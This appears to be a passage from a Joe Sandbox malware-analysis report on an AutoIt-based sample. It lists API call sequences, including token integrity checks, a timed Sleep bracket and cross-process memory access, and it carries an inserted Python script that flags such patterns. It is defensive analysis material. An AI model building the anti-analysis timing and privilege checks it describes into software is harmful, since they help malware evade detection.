                                                                          • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00367044,80070057,?), ref: 00367160
                                                                          • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00367044,80070057,?,?), ref: 0036716C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                          • String ID:
                                                                          • API String ID: 3897988419-0
                                                                          • Opcode ID: 814a535c7e8faf91d085d080f33c54c9ff963f06d21ec21489ac4630cc01f376
                                                                          • Instruction ID: cbccdb662c7d628285c3fee8b0a8ac250d8020a78eeee8e59821519ea57cafad
                                                                          • Opcode Fuzzy Hash: 814a535c7e8faf91d085d080f33c54c9ff963f06d21ec21489ac4630cc01f376
                                                                          • Instruction Fuzzy Hash: 1601F2B2604204BFDB124F24DC48BAA7BFCEF45795F158066FD08D2224D772DD408BA0
                                                                          APIs
                                                                          • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00375260
                                                                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0037526E
                                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00375276
                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00375280
                                                                          • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003752BC
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                          • String ID:
                                                                          • API String ID: 2833360925-0
                                                                          • Opcode ID: 67250fa737d6c2ab09c035c5089e787e8bf33c615201592e15ef58801681fd43
                                                                          • Instruction ID: 4bbdd92f8bd00bc2f382954be5c1c60abc23af0eca36f0ab9345c37d59cc2d39
                                                                          • Opcode Fuzzy Hash: 67250fa737d6c2ab09c035c5089e787e8bf33c615201592e15ef58801681fd43
                                                                          • Instruction Fuzzy Hash: 6701AD31C01A1DDBCF16EFE4D8485EDBB7CFB08301F004856E945F2142CB7555108BA5
                                                                          APIs
                                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00368121
                                                                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0036812B
                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0036813A
                                                                          • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00368141
                                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00368157
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                          • String ID:
                                                                          • API String ID: 44706859-0
                                                                          • Opcode ID: 09c4d0fac9149d1c2c3d7169e97139db8dfb87d581e5d879fc799f6ae545112a
                                                                          • Instruction ID: 7e29f6e322f9b6790040b366e5128e64c1e25491a56305d101185c36f049ec73
                                                                          • Opcode Fuzzy Hash: 09c4d0fac9149d1c2c3d7169e97139db8dfb87d581e5d879fc799f6ae545112a
                                                                          • Instruction Fuzzy Hash: D4F06275200304BFEB221FA5EC99E6B3BACFF4A758F104126F945C6160CB62DD51DA60
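The two listings above, the QueryPerformanceCounter / QueryPerformanceFrequency / Sleep / QueryPerformanceCounter sequence at 00375260 and the GetTokenInformation / GetLastError / GetProcessHeap / HeapAlloc / GetTokenInformation sequence at 00368121, are rendered in the report's fixed `Name.MODULE(args), ref: address` form, which makes them easy to triage mechanically. The Python below is an added example, not part of the Joe Sandbox report and not code from the sample: it parses that form (including the `Part of subcall function` prefix, bare entries with no argument list, and enum arguments the report annotates as `00000003(TokenIntegrityLevel)`) and flags two call shapes visible in those listings, a Sleep bracketed by two QueryPerformanceCounter reads, which is the shape of a wall-clock skew measurement, and the size-probe-then-fill idiom around GetTokenInformation. The sample input is copied from the two listings above; the function names and the set of allocator APIs accepted by the second matcher are assumptions introduced here, and neither matcher asserts anything about what the sample does with the results.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Added example, not part of the Joe Sandbox report: parse the "APIs" entries of one
# function listing and match two call shapes over the parsed sequence. Entries look like
#   • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00368121
#   • CoUninitialize.OLE32 ref: 0037C6B7
#     • Part of subcall function 00317DE1: _memmove.LIBCMT ref: 00317E22
API_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>[A-Za-z_][\w@:]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
ENUM_ARG = re.compile(r"[0-9A-Fa-f]+\((\w+)\)")   # report's "<hex>(<symbolic name>)" form
ALLOCATORS = {"HeapAlloc", "LocalAlloc", "GlobalAlloc", "VirtualAlloc", "CoTaskMemAlloc"}  # assumption


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int                          # call-site address from "ref: XXXXXXXX"
    subcall_of: Optional[int] = None  # set for "Part of subcall function XXXXXXXX" entries


def split_args(raw: Optional[str]) -> List[str]:
    """Split on top-level commas only, so '00000003(TokenIntegrityLevel)' stays one argument."""
    if not raw:
        return []
    out, cur, depth = [], [], 0
    for ch in raw:
        depth += (ch == "(") - (ch == ")")
        if ch == "," and depth == 0:
            out.append("".join(cur))
            cur = []
        else:
            cur.append(ch)
    out.append("".join(cur))
    return out


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse every API entry in a pasted 'APIs' section; headers and other lines are ignored."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m is None:
            continue
        calls.append(ApiCall(m["name"], m["module"], split_args(m["args"]), int(m["ref"], 16),
                             int(m["sub"], 16) if m["sub"] else None))
    return calls


def find_timed_sleep(calls: List[ApiCall]) -> Optional[Dict[str, int]]:
    """Call-site addresses of a Sleep bracketed by two QueryPerformanceCounter reads, else None.

    Reports only that the read/wait/read shape is present, not what the function does with it."""
    seq = [c for c in calls if c.subcall_of is None]   # this function's direct calls only
    for i, c in enumerate(seq):
        if c.name != "Sleep":
            continue
        before = next((p for p in reversed(seq[:i]) if p.name == "QueryPerformanceCounter"), None)
        after = next((n for n in seq[i + 1:] if n.name == "QueryPerformanceCounter"), None)
        if before is not None and after is not None:
            return {"start": before.ref, "sleep": c.ref, "end": after.ref}
    return None


def find_two_phase_query(calls: List[ApiCall], api: str = "GetTokenInformation") -> Optional[str]:
    """Detect the size-probe-then-fill idiom: api(), GetLastError, an allocation, api() again.

    Returns the symbolic class annotated on the probe call ('TokenIntegrityLevel' above),
    '<unlabelled>' if the idiom is present without one, None if the idiom is absent."""
    seq = [c for c in calls if c.subcall_of is None]
    names = [c.name for c in seq]
    for i, c in enumerate(seq):
        if c.name != api or api not in names[i + 1:]:
            continue
        between = set(names[i + 1:names.index(api, i + 1)])
        if "GetLastError" in between and ALLOCATORS & between:
            labels = [m.group(1) for a in c.args if (m := ENUM_ARG.fullmatch(a))]
            return labels[0] if labels else "<unlabelled>"
    return None


# Sample input, copied from the two function listings above this block.
TIMING_LISTING = """\
APIs
• QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00375260
• QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0037526E
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00375276
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00375280
• Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003752BC
"""
TOKEN_LISTING = """\
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00368121
• GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0036812B
• GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0036813A
• HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00368141
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00368157
"""

if __name__ == "__main__":
    print(find_timed_sleep(parse_api_lines(TIMING_LISTING)))
    print(find_two_phase_query(parse_api_lines(TOKEN_LISTING)))
```

Paste any function's `APIs` section from the report into `parse_api_lines`. `find_timed_sleep` returns None for listings without the bracket, and `find_two_phase_query` only reports the idiom when a GetLastError and an allocation call sit between the two queries, so a single GetTokenInformation into a preallocated buffer is not flagged. Entries marked `Part of subcall function` are parsed but excluded from both matchers, since they belong to a callee rather than to the listed function itself.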
                                                                          APIs
                                                                          • GetDlgItem.USER32(?,000003E9), ref: 0036C1F7
                                                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 0036C20E
                                                                          • MessageBeep.USER32(00000000), ref: 0036C226
                                                                          • KillTimer.USER32(?,0000040A), ref: 0036C242
                                                                          • EndDialog.USER32(?,00000001), ref: 0036C25C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                          • String ID:
                                                                          • API String ID: 3741023627-0
                                                                          • Opcode ID: 917c9fca5476e752ab14c3b3d20b7936bd270add40b6f1b3125a3c9909f81ec8
                                                                          • Instruction ID: 41990c62fc85f55af539b054dec4028548f73ed9075746bd815411d7db6c5f55
                                                                          • Opcode Fuzzy Hash: 917c9fca5476e752ab14c3b3d20b7936bd270add40b6f1b3125a3c9909f81ec8
                                                                          • Instruction Fuzzy Hash: 8201A7305143049BEB226B60DD5EBA6777CBB00705F04466AA982D14E0D7F569548B90
                                                                          APIs
                                                                          • EndPath.GDI32(?), ref: 003113BF
                                                                          • StrokeAndFillPath.GDI32(?,?,0034B888,00000000,?), ref: 003113DB
                                                                          • SelectObject.GDI32(?,00000000), ref: 003113EE
                                                                          • DeleteObject.GDI32 ref: 00311401
                                                                          • StrokePath.GDI32(?), ref: 0031141C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                          • String ID:
                                                                          • API String ID: 2625713937-0
                                                                          • Opcode ID: cdc0c3434ddf66cab1efebeb8eccd9fd6d9c2717a9e5b522d6650f1f16118973
                                                                          • Instruction ID: 1ec7f46ab3f2bcaf44417b82335a6b27739bfb4cddbbeb9dada6f412736b865a
                                                                          • Opcode Fuzzy Hash: cdc0c3434ddf66cab1efebeb8eccd9fd6d9c2717a9e5b522d6650f1f16118973
                                                                          • Instruction Fuzzy Hash: 2DF0C934106B08EFDB275F26EC4C7983BACAB05726F188226E529895F1C73159A5EF50
                                                                          APIs
                                                                          • CoInitialize.OLE32(00000000), ref: 0037C432
                                                                          • CoCreateInstance.OLE32(003A2D6C,00000000,00000001,003A2BDC,?), ref: 0037C44A
                                                                            • Part of subcall function 00317DE1: _memmove.LIBCMT ref: 00317E22
                                                                          • CoUninitialize.OLE32 ref: 0037C6B7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                          • String ID: .lnk
                                                                          • API String ID: 2683427295-24824748
                                                                          • Opcode ID: 1242629dfa5e6905d068ceed539184b25e10450893eeb423bbb81f961119bc53
                                                                          • Instruction ID: 5a8c092144fb7bd5c3eff0f92c8bca73e93f05c1931a38c3004a8c81e6360bd0
                                                                          • Opcode Fuzzy Hash: 1242629dfa5e6905d068ceed539184b25e10450893eeb423bbb81f961119bc53
                                                                          • Instruction Fuzzy Hash: 6BA14A71108205AFD705EF64C891EAFB7ECEF89354F00491DF1568B1A2EB71EA49CB62
                                                                          APIs
                                                                            • Part of subcall function 00330DB6: std::exception::exception.LIBCMT ref: 00330DEC
                                                                            • Part of subcall function 00330DB6: __CxxThrowException@8.LIBCMT ref: 00330E01
                                                                            • Part of subcall function 00317DE1: _memmove.LIBCMT ref: 00317E22
                                                                            • Part of subcall function 00317A51: _memmove.LIBCMT ref: 00317AAB
                                                                          • __swprintf.LIBCMT ref: 00322ECD
                                                                          Strings
                                                                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00322D66
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                          • API String ID: 1943609520-557222456
                                                                          • Opcode ID: faa23519e81172c50423e2b615be36032ce4a3aa658a96925e797aad1981bdd2
                                                                          • Instruction ID: 4ba0f64a5cb3f614567fd4196a85f8c3a9cdda0d0d5c6ae7fdf229c5bc8ee4a0
                                                                          • Opcode Fuzzy Hash: faa23519e81172c50423e2b615be36032ce4a3aa658a96925e797aad1981bdd2
                                                                          • Instruction Fuzzy Hash: 44916171108211AFC71AEF24D896CAFB7B8EF99710F05491DF8559B2A1EB30ED48CB52
                                                                          APIs
                                                                            • Part of subcall function 00314750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00314743,?,?,003137AE,?), ref: 00314770
                                                                          • CoInitialize.OLE32(00000000), ref: 0037B9BB
                                                                          • CoCreateInstance.OLE32(003A2D6C,00000000,00000001,003A2BDC,?), ref: 0037B9D4
                                                                          • CoUninitialize.OLE32 ref: 0037B9F1
                                                                            • Part of subcall function 00319837: __itow.LIBCMT ref: 00319862
                                                                            • Part of subcall function 00319837: __swprintf.LIBCMT ref: 003198AC
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                          • String ID: .lnk
                                                                          • API String ID: 2126378814-24824748
                                                                          • Opcode ID: bacd81d3691c012d55d75bf734f1d7abb91d92e5174075cd8c4ebe484efd262e
                                                                          • Instruction ID: eb99b04c5382027888d812ad21571c814c138b7a9728d75793bb3ae221ffb81b
                                                                          • Opcode Fuzzy Hash: bacd81d3691c012d55d75bf734f1d7abb91d92e5174075cd8c4ebe484efd262e
                                                                          • Instruction Fuzzy Hash: F8A165746042019FC716EF14C890E9AB7F5FF89314F058989F8999B3A1CB31ED45CB91
                                                                          APIs
                                                                          • OleSetContainedObject.OLE32(?,00000001), ref: 0036B4BE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ContainedObject
                                                                          • String ID: AutoIt3GUI$Container$%:
                                                                          • API String ID: 3565006973-879563236
                                                                          • Opcode ID: 6608e1233846cc1051d03369f9db117b49e8d22fc7efd8426c031b0de1175bb5
                                                                          • Instruction ID: b89b1597d97647a88fccf3f76b819eacfc5cc699a077c310ed033f8468863df8
                                                                          • Opcode Fuzzy Hash: 6608e1233846cc1051d03369f9db117b49e8d22fc7efd8426c031b0de1175bb5
                                                                          • Instruction Fuzzy Hash: D4913974200601AFDB15DF64C884BAABBE9FF49710F20856DF946CB6A5DB70E881CF50
                                                                          APIs
                                                                          • __startOneArgErrorHandling.LIBCMT ref: 003350AD
                                                                            • Part of subcall function 003400F0: __87except.LIBCMT ref: 0034012B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorHandling__87except__start
                                                                          • String ID: pow
                                                                          • API String ID: 2905807303-2276729525
                                                                          • Opcode ID: 13607f701d4e68c7514f72f4cd31ce3d23914d97c96e9e32a62a3ff8fb778745
                                                                          • Instruction ID: b15e023c63c00af92b13cef0cc606918a79851ed2e654ee84a12faeedd39056d
                                                                          • Opcode Fuzzy Hash: 13607f701d4e68c7514f72f4cd31ce3d23914d97c96e9e32a62a3ff8fb778745
                                                                          • Instruction Fuzzy Hash: 03516771B0860286DB1B7B24CDC136E3BD8EB41710F208D59E5D68E2E9EF759DC49AC2
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID: 3c2$_2
                                                                          • API String ID: 4104443479-3690450720
                                                                          • Opcode ID: 91984a69a894fbe63956f78dc2ccded04254d282cac9091dfc5acf83e01414f3
                                                                          • Instruction ID: acb416bfceec055953f7eaf7f4e54f440844ee80946203782632972508a2a5e4
                                                                          • Opcode Fuzzy Hash: 91984a69a894fbe63956f78dc2ccded04254d282cac9091dfc5acf83e01414f3
                                                                          • Instruction Fuzzy Hash: 0A517E70E00619DFCB26CF68D880AAEB7F5FF44305F158529E85AE7260EB30A959CB51
                                                                          APIs
                                                                            • Part of subcall function 003714BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00369296,?,?,00000034,00000800,?,00000034), ref: 003714E6
                                                                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0036983F
                                                                            • Part of subcall function 00371487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003692C5,?,?,00000800,?,00001073,00000000,?,?), ref: 003714B1
                                                                            • Part of subcall function 003713DE: GetWindowThreadProcessId.USER32(?,?), ref: 00371409
                                                                            • Part of subcall function 003713DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0036925A,00000034,?,?,00001004,00000000,00000000), ref: 00371419
                                                                            • Part of subcall function 003713DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0036925A,00000034,?,?,00001004,00000000,00000000), ref: 0037142F
                                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003698AC
                                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003698F9
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                          • String ID: @
                                                                          • API String ID: 4150878124-2766056989
                                                                          • Opcode ID: 02ea01bc82e0c764ee2b3cc68e18c4900fa99e8c6bd2aec7d44bf86e179504de
                                                                          • Instruction ID: 9c640cac6ebdf340464c1c7e0447eea8d58045b55fd198a9fc43dc05b0a89f20
                                                                          • Opcode Fuzzy Hash: 02ea01bc82e0c764ee2b3cc68e18c4900fa99e8c6bd2aec7d44bf86e179504de
                                                                          • Instruction Fuzzy Hash: FA414176900218BFDB21DFA4CC41BDEBBB8EF09300F008199F945B7151DA756E45CBA0
                                                                          APIs
                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0039F910,00000000,?,?,?,?), ref: 003979DF
                                                                          • GetWindowLongW.USER32 ref: 003979FC
                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00397A0C
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: Window$Long
                                                                          • String ID: SysTreeView32
                                                                          • API String ID: 847901565-1698111956
                                                                          • Opcode ID: 32febb8d2eacd2b7228a572ff5e692346443d083ab222a1e3738f98c955cee8b
                                                                          • Instruction ID: 520ff24f9190c7633d104aa545245359e752c40bcdb43813f8c70f0300a1db0a
                                                                          • Opcode Fuzzy Hash: 32febb8d2eacd2b7228a572ff5e692346443d083ab222a1e3738f98c955cee8b
                                                                          • Instruction Fuzzy Hash: 7731AB32214206AFDF169E38DC45BEB77A9EB09324F254725F875E22E0D731ED518B50
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00397461
                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00397475
                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00397499
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: MessageSend$Window
                                                                          • String ID: SysMonthCal32
                                                                          • API String ID: 2326795674-1439706946
                                                                          • Opcode ID: d5dfb54019843d67aeedf13d28d3ae749cc532b8d807224484b23aae1933d431
                                                                          • Instruction ID: 4eee5f2b2583244f5540876220a02bd696fb82456735cb5ddf4171a2787cdec3
                                                                          • Opcode Fuzzy Hash: d5dfb54019843d67aeedf13d28d3ae749cc532b8d807224484b23aae1933d431
                                                                          • Instruction Fuzzy Hash: 1121D332510219BFDF128F55DC46FEA3B69EF48724F120114FE15AB1D1DA75AC51CBA0
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00397C4A
                                                                          • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00397C58
                                                                          • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00397C5F
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: MessageSend$DestroyWindow
                                                                          • String ID: msctls_updown32
                                                                          • API String ID: 4014797782-2298589950
                                                                          • Opcode ID: 09bf0c33b4fbd37f26e4dfa133aa974c887e6746b19df6e06c7dedf42682ece0
                                                                          • Instruction ID: 399f43844a368ec8fbc2c3a78c6d950d726d1f54ee7a2c2329761dea229e6faa
                                                                          • Opcode Fuzzy Hash: 09bf0c33b4fbd37f26e4dfa133aa974c887e6746b19df6e06c7dedf42682ece0
                                                                          • Instruction Fuzzy Hash: 75215EB5614209AFDB12DF24DCC1DA777ECEF4A394B550059FA019B3A1CB31EC519B60
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00396D3B
                                                                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00396D4B
                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00396D70
                                                                          Strings
                                                                          Similarity
